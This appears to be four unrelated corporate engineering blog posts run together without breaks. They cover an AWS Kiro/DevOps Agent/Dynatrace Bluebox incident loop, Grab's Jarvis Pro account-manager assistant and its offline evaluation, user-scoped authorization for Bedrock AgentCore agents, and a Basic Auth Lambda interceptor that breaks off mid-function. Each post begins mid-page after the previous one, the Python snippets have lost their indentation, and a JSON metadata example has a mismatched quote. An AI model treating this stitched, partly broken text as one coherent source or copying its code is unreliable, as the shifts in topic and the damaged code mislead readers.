Without production telemetry, AI-generated code operates in a vacuum – it cannot know that an endpoint handles 40:1 read-to-write ratios, that a service dependency has specific latency characteristics, or how API traffic fluctuates throughout the day. Bluebox grounds actions taken by Kiro and AWS DevOps Agent in how the system actually behaves, not in assumptions about how it should behave.
How the closed loop works
The combination of Kiro, AWS DevOps Agent, and Bluebox creates a continuous cycle from development through production and back:
Production-aware code generation: Before code is written, Kiro retrieves runtime context from Bluebox – service topology, traffic patterns, and resource utilization. Kiro’s spec-driven workflow translates this context into requirements and generates code that aligns with real production conditions from the first commit.
Confident code review: Kiro generates pull requests with production evidence attached. The release management capability in AWS DevOps Agent reviews the change for dependency impacts, drifts from internal standards, and production readiness – running autonomous tests in isolated environments.
Continuous monitoring: After deployment, Dynatrace continuously monitors application behavior. When an anomaly occurs, Bluebox detects it and surfaces full production context.
Autonomous investigation: Bluebox triggers AWS DevOps Agent with the relevant observability and topology data. AWS DevOps Agent performs a deep investigation, correlating telemetry, logs, infrastructure changes, and deployment history to pinpoint the root cause.
Automated remediation: AWS DevOps Agent generates the mitigation plan from the observability and runtime data that Bluebox provides. Bluebox adds that plan to the investigation report and files it as a GitHub issue. Kiro then proposes a production-aware fix as a pull request for your review, completing the loop.
Figure 1: Bluebox supports the closed loop from feature build to operations.
Next, we walk through a concrete example of this workflow in action.
Walkthrough
We follow a travel-booking application through two connected scenarios: shipping a new feature with production context, then responding to a production incident after it deploys.
Building a production-aware feature
Consider a team enhancing a travel booking application to improve customer experience. You begin by describing a new feature in Kiro, such as updating how products are displayed or adjusting backend logic to support new capabilities. In this case, we are using Kiro IDE.
Figure 2. A feature request in Kiro, with the project’s steering documents loaded for context.
Kiro’s spec-driven workflow expands this request into structured requirements before writing code. You connect Kiro to the Bluebox CLI to retrieve the full production context from Dynatrace: service dependencies, runtime topology, and observed traffic. The following figure shows how Kiro queries current load data for the flight-search path, including the ratio of Amazon DynamoDB reads to writes. Kiro composes and runs the CLI command on your behalf, so you don’t have to type it or set environment variables by hand. The command and its output stay visible in the session, so you can approve it before it runs and check what was retrieved before acting on it. In this case, the command queries the Bluebox API for the requested metrics. The output returns read and write counts per second for the DynamoDB table behind flight search, along with the services calling it.
Figure 3. Kiro runs the Bluebox CLI, then reads the codebase with production context before proposing changes.
The telemetry shows the flight-search endpoint is read-heavy. Users repeatedly query the same routes, at roughly 40 reads for every write against the DynamoDB table. Repeated identical reads are what a cache absorbs, so Kiro proposes an Amazon ElastiCache layer in front of the table, sized to the active working set derived from the observed request distribution. Without the read-to-write ratio, the same request could have produced a larger provisioned table or an added read replica, neither of which addresses repeated identical queries.
Kiro generates the code that implements the change and opens a pull request in GitHub for review. Nothing reaches production until a reviewer approves and merges it. The pull request carries the code changes and the Bluebox telemetry that justified them, so reviewers assess the decision against the same telemetry Kiro retrieved.
Figure 4. Kiro pushes a feature branch and opens a pull request in GitHub.
After review and approval through standard processes, a reviewer merges the pull request, and the existing CI/CD pipeline deploys the change.
Figure 5. The pull request is reviewed and merged through the standard GitHub workflow.
Responding to a production incident
With the feature live, Dynatrace continues monitoring the application. A marketing promotion then drives traffic above the observed baseline, and failed requests start to appear. The loop now runs from operations back to development.
Figure 6. Dynatrace detects a spike in failed requests, surfacing the production incident.
Bluebox collects the relevant observability and topology data, runs an initial root-cause analysis, then opens an autonomous investigation in AWS DevOps Agent. The AWS DevOps Agent multi-agent reasoning architecture decomposes the investigation across specialized capabilities that each examine one class of evidence: telemetry, logs, infrastructure configuration, and recent deployment activity.
Figure 7. Bluebox delegates an autonomous investigation to AWS DevOps Agent.
AWS DevOps Agent locates the cause in the DynamoDB table rather than the new cache. The table’s billing mode had been changed to PROVISIONED, with 5 read capacity units (RCU) and 5 write capacity units (WCU) and no auto scaling. The ElastiCache layer absorbs repeated reads, but cache misses and all writes still reach DynamoDB, and at promotion traffic that residual load exceeds 5 RCU and 5 WCU. AWS DevOps Agent produces a mitigation plan with specific remediation steps. This plan and the full investigation context from Bluebox, is documented as a GitHub issue.
Figure 8. GitHub issue is created with results from Bluebox and AWS DevOps Agent.
Kiro proposes a production-aware fix as a new pull request – including the root-cause analysis, supporting telemetry, and recommended configuration changes.
Figure 9. The Kiro coding session works on the GitHub issue and creates a remediation Pull Request.
The fix is reviewed, merged, and deployed like any other change. Dynatrace then confirms that error rates and response times return to baseline, which closes the loop.
Conclusion
In this post, we showed how Kiro, AWS DevOps Agent, and Bluebox by Dynatrace connect production telemetry with feature development and incident remediation. The travel-booking example keeps human review and existing CI/CD controls in the process while passing operational context from production back to development.
To get started pick one application and define a measurable outcome, such as investigation time, change-failure rate, or pull-request review time. Then:
Download Kiro and start building with spec-driven development
The first Jarvis Pro prototype could produce answers that sounded right.
That was the problem.
One early answer looked polished: it named the merchant, summarized the week, and recommended pushing promotions before the next review. It was also wrong. The merchant’s order volume was down, but the sharper issue was operational: more outlets were paused and fulfilment had slipped. Sending more demand into that setup would have made the merchant look worse.
That failure changed how we judged the system. Fluent was not enough.
Jarvis Pro is the AI assistant we built for Grab account managers. Its job is to help them turn account data into better merchant conversations: what changed, why it changed, and what to do next. They rarely ask clean dashboard questions. They ask: “I am meeting this merchant tomorrow. What should I tell them?” or “Which accounts in my portfolio need attention this week?”
Those questions hide decisions: scope, access, business diagnosis, and metric definition. If the system gets those wrong, confidence becomes a liability.
So the core design became: route first, answer later.
In an internal offline evaluation (not a measure of production performance or business impact), routing matched the expected safe route for 99.4% of 351 realistic prompts drawn from labelled eval sets from the first half of 2026. In a focused portfolio and brand answer-quality suite, the average score moved from 78.5 to 91.0. These figures come from offline launch-readiness evaluation only; they are not business-impact proof.
Why dashboards were easier
A dashboard answers a bounded question:
“Show net sales for merchant X last week.”
An account review question has to diagnose the work to be done:
“This merchant softened this week. Should I push promos, ads, or operations fixes before the review?”
If outlets were paused, more traffic can backfire. If average order value fell, the next action may be menu or bundle design. If a dashboard, warehouse table, and local spreadsheet disagree, the first task is metric reconciliation, not recommendation.
We wanted Jarvis Pro to classify the task first, then load only the context needed for that task.
The route as a contract
The launch router was a prompted LLM classification step constrained by a routing guide: supported task types, allowed context, answer shapes, and conditions that should force a handoff or refusal.
A broad merchant review routes differently from an ads campaign recap or an out-of-scope request. A route is not just a label; it decides the structure, metrics, tool path, and guardrails.
Figure 1. Jarvis Pro routes before it answers. The route determines context, tools, and guardrails; evaluation checks each layer, not only the final response.
Here is a simplified example. The merchant and numbers are illustrative.
User prompt
I am seeing Merchant A soften this week. I need talking points for tomorrow’s review. Should I push promos, ads, or operations fixes?
Router decision
Ilustrative example only. No actual, live, or non-public data was used.
Merchant A’s issue looks like order volume, not basket size. Net sales fell 7.8% week-on-week and orders fell 9.1%, while average order value increased 1.4%.
Start with operations before promotions. Temporary pause rate rose from 2.1% to 4.8%, and fulfilment fell from 94.6% to 91.8%. Extra demand may leak unless the merchant fixes availability first.
Talking point: “Before we add promo depth, let’s recover lost availability. If we bring pause rate back below 2.5%, we should have a cleaner read on whether the remaining gap is demand, menu, or ads.”
The route prevented three common mistakes: jumping straight to discounts, inventing competitor spend, and answering from a generic growth template.
Memory had to stay narrow
Here, “memory” means saved user context such as country, role, portfolio scope, and preferences. That context is useful when a user says “my portfolio”. It is risky when saved defaults override explicit context, missing identity becomes a guess, or a memory request crosses user boundaries.
We put memory before answer generation and kept the decision small: proceed, ask for onboarding information, prefer explicit context, use saved defaults, look up portfolio scope, or refuse. Backend permissions and row-level controls remain the authorization layer.
That extra checking costs time. Jarvis Pro does route classification, memory checking, context selection, warehouse or specialist tool calls, then generation. To keep the wait usable, we loaded route-specific context, ran memory before expensive retrieval, consolidated warehouse queries, capped tool calls, and returned unavailable cells as N/A instead of looping until the conversation stalled.
That tradeoff was deliberate: a slower first token was better than a fast unsafe recommendation.
Reconcile the metric before blaming the model
Even with good routing and memory, an assistant is only as good as the numbers it pulls.
When a user says “the number is wrong”, several failures can look identical: wrong source, different metric definitions, different entity mapping, or stale data. One reconciliation pass showed that what looked like model error was sometimes just a freshness mismatch between reporting surfaces.
We built regression checks that normalised source values and compared daily rows across approved metric paths. The point was not the row count. It was knowing whether to fix source selection, metric guidance, or the caveat shown to the account manager.
How we evaluated it
One aggregate score would have hidden the failures we cared about.
The routing set had 351 prompts labelled against the routing guide. Each prompt had an expected route family, meaning the broad business category, plus an expected route and any handoff or refusal. “Accepted route accuracy” meant the selected route was exact or semantically equivalent and safe. A wrong business family, missed handoff, or unsafe scope failed.
The answer-quality suite had 501 total cases scored on a 0-100 rubric covering template fit, metric use, diagnosis, next action quality, caveats, and guardrail compliance. Within that suite, the 150-case portfolio and brand subset improved from 78.5 to 91.0. A wrong merchant, wrong country, fabricated metric, unsupported projection, or private competitor detail could fail a case. User isolation was treated as a hard evaluation requirement. All scores were measured offline against fixed rubrics for launch readiness; they do not reflect production commercial outcomes.
That caught the answer we most wanted to avoid: plausible, polished, and operationally unsafe.
The lesson we would reuse
The final paragraph is too late to resolve ambiguity. Jarvis Pro has to earn the right to answer: route the task, check memory and access, load the right evidence, cap the tools, then judge failures at each layer.
Offline evals gave us confidence in system behaviour, not commercial uplift. Measuring that needs production telemetry: recommendations shown, actions taken, accounts affected, and outcomes.
The assistant should not merely sound like a great account manager. It should first prove it understands the account.
Join us
Grab is Southeast Asia’s leading superapp, serving over 900 cities across eight countries (Cambodia, Indonesia, Malaysia, Myanmar, the Philippines, Singapore, Thailand, and Vietnam). Through a single platform, millions of users access mobility, delivery, and digital financial services, including ride-hailing, food delivery, payments, lending, and digital banking via GXS Bank and GXBank. Founded in 2012, Grab’s mission is to drive Southeast Asia forward by creating economic empowerment for everyone while delivering sustainable financial performance and positive social impact.
Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!
Many teams now deploy AI agents that pull from Amazon DynamoDB tables, document repositories, software as a service (SaaS) platforms, and internal knowledge bases to answer questions and automate workflows. A key risk in these deployments is that the agent has no awareness of who’s asking, so it might return data the user shouldn’t see.
If you’re using Amazon Bedrock AgentCore to build AI agents that access multiple data sources, you need each user to see only the data they’re authorized to access. In this post, you learn patterns for propagating user authorization context through your agents so access control is enforced by infrastructure and downstream services, not by agent code. In this post, we show you how to deploy agents that enforce least privilege access without writing authorization logic in the agent itself. This approach follows AGENTSEC03 best practice in the AWS Well-Architected Agentic AI Lens.
Use case
Consider an example of a customer relationship management (CRM) chat application where employees from Sales and Finance departments interact with an AI agent to access customer information. Employees use the same chat interface and the same agent, but each department needs isolated access to their respective data:
Sales needs access to customer contracts, pricing strategies, and sales pipeline data
Finance needs access to customer invoices, payment records, and financial reports
The AI agent accesses three types of data sources on behalf of users:
Customer records in Amazon DynamoDB, partitioned by department
When a Sales employee asks, “Show me customer contracts,” the agent must retrieve only Sales department contracts, not Finance invoices. This enforcement must happen outside the agent so that even if the agent is compromised through prompt injection or application bugs, it can’t access unauthorized data.
Note: Although we use department-based scoping in this example, the pattern generalizes to any custom claim you define, whether it represents a role, business unit, geographic region, or project assignment.
Architecture overview
The following diagram shows the architecture used in this demonstration.
Figure 1: Target architecture
The data flow shown in Figure 1 includes:
A user opens the chat application and authenticates with Amazon Cognito user pool , which acts as the identity provider (IdP).
A pre token generation Lambda trigger (V2) enriches the JSON Web Tokens (JWTs) with a custom claim and AWS session tag metadata before returning them to the user.
The web app routes the user’s request along with the access token to the agent deployed on Amazon Bedrock AgentCore Runtime.
Bedrock AgentCore Runtime validates the inbound JWT and, through Bedrock AgentCore Identity, issues a workload access token that binds the user and agent identities, and then invokes the agent.
For queries requiring internal documents, the agent uses its AWS Identity and Access Management (IAM) role to query Amazon Bedrock Knowledge Bases (backed by an Amazon S3 vector store) with metadata filtering, and DynamoDB with user-scoped session-tagged credentials.
The agent calls the Salesforce REST API using the user-scoped token. Salesforce applies sharing rules and returns only records the user is authorized to access.
This architecture follows two key principles.
The agent acts as an orchestrator, not a gatekeeper; it coordinates tool calls and reasoning but doesn’t control access to data. Authorization is enforced by downstream services.
The agent doesn’t store credentials to data stores; instead, each request gets temporary, user-bound access tokens.
In the following sections, we dive deep into each data source to show how these principles are achieved in practice.
Initial user authentication with IdP
When an employee opens the chat application, they authenticate using their corporate credentials. For this example, you use Amazon Cognito user pools as the IdP. You can also achieve this with other IdPs such as Entra ID or Okta.
The pre token generation Lambda trigger (V2) captures the user’s custom department context and adds it to the tokens to both the identity (ID) token and access token that Bedrock AgentCore Runtime uses for authorization decisions each serving a distinct purpose. The access token is used by the Bedrock AgentCore Runtime custom JWT authorizer for inbound authorization. The ID token also receive the https://aws.amazon.com/tags claim (used by AWS Security Token Service (AWS STS)) for session tags). The https://aws.amazon.com/tags claim is the specific format required by AWS STS to extract session tags during AssumeRoleWithWebIdentity. For more information and step-by-step guidance see How to customize access tokens in Amazon Cognito user pools.
The following example shows the key logic within a pre token generation Lambda handler function configured as a trigger on your Amazon Cognito user pool. This code runs automatically when a user authenticates, extracting their department attribute and adding it as a custom claim to both ID Token and access token.
When the user request reaches AgentCore Runtime, the Inbound JWT authorizer performs two checks as shown in Figure 2. It validates the JWT token with Amazon Cognito (the configured IdP) by cryptographically verifying the token’s signature, confirming it is non-expired, and checking it was issued by the trusted IdP. It then extracts the department claim from the validated token and compares it against the expected value configured in the authorizer, any token without a matching claim is rejected before the agent code is invoked.
Figure 2: Inbound JWT authorization
The following example shows the inbound JWT authorizer configuration that you pass when deploying your agent to AgentCore Runtime. This configuration tells AgentCore which IdP to validate against and which custom claim value to enforce for this agent. In this example, inboundTokenClaimName is department, inboundTokenClaimValueType declares the claim type as STRING_ARRAY, and authorizingClaimMatchValue specifies the allowed values ([“Sales”, “Finance”]) with the CONTAINS_ANY operator. The authorizer validates that the department claim is present in the token and matches one of these values, ensuring only authenticated users from the Sales or Finance department can invoke the agent.
Note: AgentCore Runtime automatically creates a workload identity for each deployed agent. A workload identity represents the digital identity of your agents within the AWS environment. It allows agents to maintain consistent identity whether they’re using IAM roles for AWS resource access, OAuth 2.0 tokens for external service integration, or API keys for third-party tool access.
Passing the user context for agent outbound authorization
After the inbound JWT token is validated and the user’s authorization context is confirmed, the agent must propagate this context to downstream resources. The fundamental security challenge here is how to design a system so that an agent acting on behalf of a user can only access data that user is authorized to see, even if the agent itself is compromised.
The traditional approach of granting the agent broad credentials and relying on application-level filtering (such as adding WHERE clauses to queries) creates a single point of failure. If an attacker manipulates the agent through prompt injection or exploits a bug in the filtering logic, the full dataset becomes accessible. A more resilient design moves authorization enforcement out of the agent’s application code and into the infrastructure layer wherever possible. Instead of trusting the agent to filter results correctly, you configure the underlying services—IAM policies, database access controls, SaaS sharing rules—to reject unauthorized requests regardless of what the agent asks for. This way, the agent’s credentials are inherently limited to the requesting user’s permissions, and no amount of prompt manipulation can bypass those boundaries. Where infrastructure-level enforcement isn’t yet available, such as metadata filtering in Amazon Bedrock Knowledge Bases, the agent applies application-layer controls as a complementary measure. The following sections demonstrate how this principle applies to each data source in our architecture.
Pattern 1: Scoping DynamoDB access to the requesting user
For DynamoDB access, you can use AssumeRoleWithWebIdentity with session tags to create per-request, user-scoped credentials rather than granting the agent a static IAM role with direct table access. The agent passes the user’s signed ID token to AWS STS, which extracts the department tag from the token’s https://aws.amazon.com/tags claim and returns temporary credentials constrained to that department’s data partition. This moves access control from agent code to IAM policy evaluation. STS additionally validates the token’s audience (aud) claim against the IAM OIDC provider configuration, preventing tokens issued for other app clients from being used to assume the role. The following diagram shows this flow (Figure 3).
Before this runtime flow can execute, complete the following configuration:
Register Amazon Cognito as an IAM OIDC provider. Although the user authenticates using the Cognito API (USER_PASSWORD_AUTH), STS requires Cognito to be registered as an OIDC provider so it can discover and validate ID tokens. Configure the allowed client IDs (audiences) on the provider to match your application’s app client ID.
Configure the UserScopedDynamoDBRole trust policy to include both sts:AssumeRoleWithWebIdentity and sts:TagSession permissions, with the Amazon Cognito OIDC provider as the federated principal.
By default, AgentCore Runtime drops custom headers as a security measure. To allow the X-Id-Token header through to the agent container, configure it in the agent runtime’s requestHeaderAllowlist so the ID token is forwarded to agent code. The following configuration tells AgentCore Runtime to forward only the X-Id-Token header to agent code, dropping other non-standard headers:
The user authenticates with Amazon Cognito using USER_PASSWORD_AUTH.
The JWT is issued with a custom department claim and the https://aws.amazon.com/tags claim for STS session tagging (covered in the preceding Initial user authentication with IdP section).
Amazon Cognito returns the enriched tokens to the frontend. The access token carries the department claim for inbound authorization. The ID token carries both the department claim and the https://aws.amazon.com/tags claim for downstream STS calls.
The user asks the agent a question (for example, “Show Q4 sales pipeline”).
The frontend calls AgentCore Runtime, passing two tokens: the Amazon Cognito access token in the Authorization header (for inbound authorization), and the user’s ID token as a custom X-Id-Token header (for downstream STS calls).
AgentCore Runtime validates the JWT and verifies the department claim matches the allowed values configured in the inbound authorizer. If validation fails, the request is rejected with HTTP 401 before agent code executes. After validation, AgentCore forwards the request to the agent container along with the allowed X-Id-Token header.
The agent calls sts:AssumeRoleWithWebIdentity with the ID token. This call targets a single shared UserScopedDynamoDBRole. The following is the agent code for this step:
AWS STS validates the token against the Amazon Cognito OIDC provider registered in IAM. STS verifies the token’s cryptographic signature, expiration, issuer, and audience (aud). The aud claim in the ID token must match one of the client IDs configured on the IAM OIDC provider resource. This prevents a valid token issued by the same Cognito user pool but for a different app client from being accepted. Note that the agent’s own execution role has no DynamoDB access and only permits sts:AssumeRoleWithWebIdentity, so even a compromised agent can’t bypass this flow.
Note: Amazon Cognito user pools expose a standard OpenID Connect discovery endpoint, which is what you register as the trusted OIDC provider in IAM, even though the user signs in through the Cognito authentication APIs. When STS validates the token, it checks that the aud claim matches the client ID configured in the IAM OIDC provider. Tokens whose audience doesn’t match are rejected, adding a second control alongside signature and issuer validation.
AWS STS extracts the https://aws.amazon.com/tags claim and creates a session with aws:PrincipalTag/department set. The trust policy’s sts:TagSession permission (configured in the prerequisites) enables this. Without it, STS silently drops the session tags and subsequent access is denied.
AWS STS returns temporary credentials. These credentials are user-scoped and tamper-proof because the session tags are derived from the cryptographically signed JWT, not from agent code.
The agent queries DynamoDB using these credentials.
IAM evaluates the dynamodb:LeadingKeys condition against ${aws:PrincipalTag/department}. Only the user’s department partition is accessible. Because IAM evaluates this condition at the policy level, even if agent code is manipulated using prompt injection, cross-department access is denied. The following is an example of the permission policy on the role:
DynamoDB returns only the records from the user’s authorized department partition. Cross-department data is never returned because the IAM policy blocks the API call itself. It doesn’t rely on post-query filtering.
The agent receives the authorized results and passes them to the LLM for natural language response composition.
The composed response is returned to the frontend application and displayed to the user.
Pattern 2: User-scoped authorization to Amazon Bedrock Knowledge Bases
For documents stored in Amazon Bedrock Knowledge Bases, the agent applies metadata filtering at query time. Each document is tagged with a Department metadata attribute during ingestion. Amazon Bedrock Knowledge Bases using metadata filtering to implement the data authorization. You need to provide metadata files alongside the source data files with the same name as the source data file and .metadata.json suffix while uploading data in Amazon S3. Amazon Bedrock Knowledge Bases ingests these documents along with corresponding metadata file. The metadata attributes are stored alongside the vectors as filterable fields in the index.
Each metadata file contains a simple JSON structure with the department attribute. The following example shows the complete content of a metadata file for Sales department documents:
{"metadataAttributes": {"Department": “Sales"}}
When the agent queries Amazon Bedrock Knowledge Bases, it calls the bedrock:Retrieve action and appends the retrievalConfiguration filter scoped to the user’s department. The department value is extracted from the JWT access token that the agent received during inbound authorization.
Note: Metadata filtering is application-layer enforcement. The bedrock:Retrieve API doesn’t expose metadata filter content as an IAM condition key. For stricter isolation, consider separate knowledge bases per department with IAM resource-level policies.
Pattern 3: User-scoped access to external services using on-behalf-of token exchange
We use Salesforce as an example of an external service integration. The same on-behalf-of (OBO) token exchange pattern applies to external service that supports RFC 8693 or a compatible token exchange mechanism. External services like Salesforce don’t support IAM-based access control, so you need a different mechanism to propagate user identity. The AgentCore Identity OBO token exchange (RFC 8693) provides this by exchanging the user’s authenticated identity for a user-scoped token that the external service will recognize and enforce natively.
AgentCore Identity supports three OAuth patterns for external service access. With client credentials—Two-Legged OAuth (2LO) or machine-to-machine (M2M)—the agent authenticates as a service account and receives a token with broad access. The agent is then responsible for filtering data in queries, which makes this pattern suitable when accessing organization-wide data that isn’t scoped to an individual user. A variation of this pattern embeds user context as custom claims within the agent’s M2M token itself, see Empower AI agents with user context using Amazon Cognito. With Authorization Code (3LO), the user explicitly consents through a browser redirect and the external service enforces per-user access. This works when per-service consent is required, but it demands user interaction during the flow, making it impractical for background agent operations. Learn more about this in Secure AI agents with Amazon Bedrock AgentCore Identity on Amazon ECS. With OBO token exchange, the user’s already-authenticated identity is exchanged for a service-scoped token without any additional user interaction, and the external service enforces access.
For this use case, OBO is the most appropriate pattern. The user has already authenticated at the entry point (through the IdP), and the agent needs to act on their behalf across multiple services without prompting for additional consent. OBO propagates user identity end-to-end without the agent holding credentials, scales automatically with no per-user token storage, and allows downstream services to enforce their own authorization (sharing rules, role-based access control (RBAC)). Because no browser redirect is needed, OBO works seamlessly for background tool calls where the user isn’t present in a browser session. Figure 4 demonstrates the complete flow when using OBO token exchange.
The user authenticates with Amazon Cognito using USER_PASSWORD_AUTH.
A pre token generation Lambda function injects the custom department claim into the token (covered in the preceding Initial user authentication with IdP section).
Amazon Cognito returns the tokens to the frontend. The access token is issued with the department claim.
The user asks the agent a question (for example, “Show me Sales opportunities”).
The frontend calls AgentCore Runtime with a single agent Amazon Resource Name (ARN), passing the Amazon Cognito access token: POST /invocations, Authorization: Bearer {access_token}.
AgentCore Runtime validates the inbound JWT (signature, expiration, issuer, and custom claims including the department claim). After successful validation, AgentCore Runtime extracts the user identity from the JWT and calls the GetWorkloadAccessTokenForJWT API to exchange it for a workload access token. The agent code receives the workload access token through the invocation payload header. Workload access tokens are exclusively for accessing Amazon Bedrock AgentCore services and can’t be used directly for external services.
The agent calls AgentCore Identity (GetResourceOauth2Token) with the workload access token, requesting a Salesforce token through the configured OBO (on-behalf-of) credential provider. AgentCore Identity validates the caller identity and agent identity, then accesses the stored client credentials from Secrets Manager. If a previously stored OAuth access token has expired, AgentCore Identity automatically obtains a new one using the client credentials, reducing the need for manual token lifecycle management in agent code. The agent code uses the @requires_access_token decorator to invoke this flow:
On the AWS side, this requires an AgentCore Identity OAuth Client configured with Grant type: Token Exchange, Actor token: None, pointing to the Salesforce token endpoint. The Salesforce Connected App consumer secret is stored in Secrets Manager (the agent doesn’t access it directly).
AgentCore Identity performs RFC 8693 token exchange with the Salesforce token endpoint, sending the user identity as the subject_token. AgentCore Identity performs this secure token exchange for user-delegated access based on the configured OAuth 2.0 credential provider. The agent can’t request tokens for arbitrary users because the workload access token cryptographically binds the request to the authenticated user.
Salesforce validates the token against the registered Amazon Cognito auth provider configured in Salesforce Setup.
Salesforce resolves the user using FederationIdentifier. On the Salesforce side, this requires:
Amazon Cognito registered as an OpenID Connect auth provider
A token exchange handler (Apex class extending Auth.Oauth2TokenExchangeHandler) that resolves users by FederationIdentifier
Token exchange flow enabled on the connect app or external client app
Each user’s FederationIdentifier set to their Amazon Cognito subject’s (sub) unique user identifier (UUID).
Sharing rules configured to enforce department-scoped record access
The federation ID (sub) is immutable and can’t be spoofed by the agent, because it originates from the cryptographically signed identity token.
Salesforce returns a user-scoped access token to AgentCore Identity, which passes it back to the agent.
Agent calls the Salesforce REST API using the user-scoped token. No department filtering is needed in the Salesforce Object Query Language (SOQL) query because Salesforce enforces access through sharing rules:
@tool
def query_salesforce_opportunities(query_text: str) -> str:
access_token = _get_salesforce_token_sync()
# No department filter needed. Salesforce sharing rules enforce access.
soql = "SELECT Id, Name, Amount, StageName, CloseDate FROM Opportunity ORDER BY CloseDate DESC LIMIT 10"
response = requests.get(
f"{SALESFORCE_URL}/services/data/v59.0/query?q={urllib.parse.quote(soql)}",
headers={"Authorization": f"Bearer {access_token}"},
timeout=30,
)
return json.dumps(response.json().get("records", []))
Salesforce applies sharing rules and returns only records the user is authorized to access. The agent doesn’t hold Salesforce credentials (refresh tokens, client secrets), these remain with AgentCore Identity.
The agent’s LLM composes a response from the returned records.
The frontend displays the results to the user.
Conclusion
In this post, you learned how to enforce consistent, end-to-end authorization in agentic AI applications by propagating user context from Amazon Cognito through Amazon Bedrock AgentCore to downstream resources. We showed you three patterns:
Per-request user-scoped credentials using AssumeRoleWithWebIdentity with session tags, evaluated by IAM attribute-based access control (ABAC) policies to access Amazon DynamoDB
Department-scoped metadata filtering at the application layer to access Amazon Bedrock Knowledge Bases.
On-behalf-of token exchange (RFC 8693) using AgentCore Identity, with Salesforce-native sharing rules governing access to external CRM data.
The key takeaway is that the agent coordinates work but doesn’t decide who can access what. Access decisions are made by infrastructure-level controls and the downstream service’s authorization model. This layered approach means that even if the agent behaves unexpectedly, unauthorized data access is still blocked.
You can use this as a reference implementation and adapt it to your requirements by choosing authorization attributes relevant to your organization (such as department, role, business unit, or region), integrating additional data sources, or extending the token exchange patterns to other external services.
When deploying AI agents with Amazon Bedrock AgentCore, organizations benefit from built-in modern support for OAuth 2.0, AWS Identity and Access Management (IAM), and API key authentication through Amazon Bedrock AgentCore Gateway. However, some enterprise environments still use legacy authentication mechanisms such as HTTP Basic Authentication (Basic Auth) (RFC 7617). The extensible architecture of AgentCore Gateway enables support for these authentication mechanisms through a request Lambda interceptor—custom code that runs each time an agent calls a tool.
In this post, we show you how to use a request Lambda interceptor to authenticate to a downstream tool API using system credentials, retrieving a service account credential from AWS Secrets Manager and constructing a Basic Auth header. This design keeps credentials isolated from the agent, designed to mitigate exposure through model-driven behavior such as prompt injection.
Important: Basic Auth is an antiquated technology that transmits credentials as Base64-encoded text and should not be used as a long-term authentication strategy. AWS recommends modernizing to OAuth 2.0, SAML, OpenID Connect, or IAM where possible. However, some organizations with legacy workloads choose to decouple authentication modernization from their agentic AI adoption, addressing each on independent timelines. If your environment requires Basic Auth integration as an interim measure, consult your AWS Solutions Architect to evaluate the security trade-offs before proceeding. We’re providing this post as a reusable implementation, but it shouldn’t be construed as an endorsement of Basic Auth, or considered suitable as a long-term solution.
Solution overview
The solution uses a request Lambda interceptor in AgentCore Gateway to retrieve system credentials and construct a Basic Auth header for the downstream tool API. Figure 1 shows the end-to-end flow.
Figure 1: Solution workflow
The AI agent initiates a tool call over Model Context Protocol (MCP) to the gateway with an inbound JSON Web Token (JWT) issued by a configured identity provider (IdP). The MCP request body contains the tool name and any required parameters. The gateway’s inbound authentication layer validates the token against the IdP specified in the inbound authorizer configuration.
After inbound authentication succeeds, the gateway invokes the request Lambda interceptor, passing the original request payload and headers, including the validated JWT and its embedded claims.
The request Lambda interceptor re-validates the inbound JWT issued by the configured IdP as a defense-in-depth measure, then retrieves the system service account credential from Secrets Manager. The credential is a service account that authenticates the AI agent to the downstream tool.
The interceptor then constructs a compliant Basic Auth header using the system credential and adds it to the outbound request. Because Basic Auth transmits credentials as Base64-encoded text (not encrypted), you must implement relevant compensating controls (e.g., ensure that all communication with the downstream tool API is over TLS, conduct two-person review of Lambda code changes, and so on).
Note: The system credential stored in Secrets Manager corresponds to a service account in Active Directory (AD). The credential lifecycle requires a one-time manual seed: a system administrator creates the service account in AD and stores the same initial credential in Secrets Manager (necessary because Secrets Manager can’t read a password back from AD). As a security best practice, trigger an immediate rotation after seeding to retire the human-known password using the built-in capabilities of Secrets Manager. From that point forward, Secrets Manager automates the rotation process, periodically generates a new password, and updates both Secrets Manager and AD simultaneously. This eliminates manual credential management in either system. At runtime, the request Lambda interceptor retrieves the current credential from Secrets Manager and presents it to the downstream tool, which validates it against AD. For implementation details on keeping both stores synchronized, seeRotate Active Directory credentials stored in AWS Secrets Manager.
The AgentCore gateway forwards the adjusted request now carrying the custom authentication header to the downstream target tool.
The downstream target tool authenticates the request, processes it, and returns the response to the gateway.
The gateway relays the response back to the AI agent.
Step 1: Attach a request Lambda interceptor to your AgentCore Gateway
Configure the AgentCore gateway to invoke a request Lambda interceptor for authentication transformation before forwarding the request to the downstream tool.
Important: You must enable passRequestHeaders configuration. Without it, the request Lambda interceptor can’t receive the request header containing the inbound JWT, and the authentication pattern described in this post will not work.
The following example shows the gateway configuration:
The interceptor independently validates the JWT signature as a defense-in-depth measure, protecting against scenarios where the request Lambda interceptor could be invoked through a path that bypasses gateway validation. It fetches the identity provider’s JSON Web Key Set (JWKS) (cached across warm Lambda invocations to avoid repeated network calls), verifies the token’s signature, expiration, and issuer, then returns the decoded claims.
Step 3: Retrieve system credentials from Secrets Manager
The interceptor retrieves the system service account credential from Secrets Manager. This credential authenticates the AI agent to the downstream tool. The secret is encrypted with a customer-managed AWS Key Management Service (AWS KMS) key and cached in memory for the configured time-to-live (TTL) to minimize API calls while ensuring rotated credentials are picked up promptly.
The following code retrieves the credential from Secrets Manager:
import boto3
secrets_client = boto3.client('secretsmanager')
def get_system_credentials():
"""Retrieve the system service account credential from Secrets Manager."""
response = secrets_client.get_secret_value(
SecretId=os.environ['SYSTEM_CREDS_SECRET_NAME']
)
return json.loads(response['SecretString'])
IAM permissions: The interceptor’s execution role requires secretsmanager:GetSecretValue scoped to the specific secret Amazon Resource Name (ARN), and kms:Decrypt scoped to the KMS key used to encrypt it. Follow the principle of least privilege by restricting the resource ARN rather than using wildcards.
Note: The agent doesn’t have access to Secrets Manager. Only the request Lambda interceptor—a deterministic function not influenced by model behavior—retrieves credentials. This isolation is designed to mitigate the risk of adversarial prompts instructing the model to access or exfiltrate authentication credentials, even if the agent is compromised.
Step 4: Construct the Basic Auth header
The request Lambda interceptor constructs the Basic Auth header using the system credential retrieved for the downstream tool.
The following code shows the core transformation logic.
def build_system_auth_header(headers):
"""Validate JWT and construct Basic Auth header with system credential."""
auth_header = headers.get('Authorization', '')
if not auth_header.startswith('Bearer '):
return _error_response(401, "No Bearer token found in request.")
# Validate JWT (defense-in-depth)
claims = validate_jwt(auth_header[7:])
if not claims:
return _error_response(401, "JWT validation failed.")
